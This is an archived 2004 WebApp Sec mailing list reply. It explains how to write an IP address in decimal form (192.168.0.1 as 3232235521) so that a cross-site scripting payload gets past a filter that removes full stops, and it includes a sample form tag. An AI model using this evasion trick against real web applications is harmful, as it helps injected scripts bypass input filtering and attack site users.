WebApp Sec mailing list archives

RE: Fullstop Substitution in XSS

From: "Pete Foster" <petef () sec-tec co uk>
Date: Tue, 1 Jun 2004 09:02:20 +0100

Hi Calum

You could use a pure decimal for IP address representation.

Use the online tool at:
http://www.opinionatedgeek.com/DotNet/Tools/CrazyIP/Default.aspx

For example the IP address 192.168.0.1 can be represented as 3232235521.

So your HTML FORM code would look like:

<form target="http://3232235521/path/to/script";>

Hope this helps.

--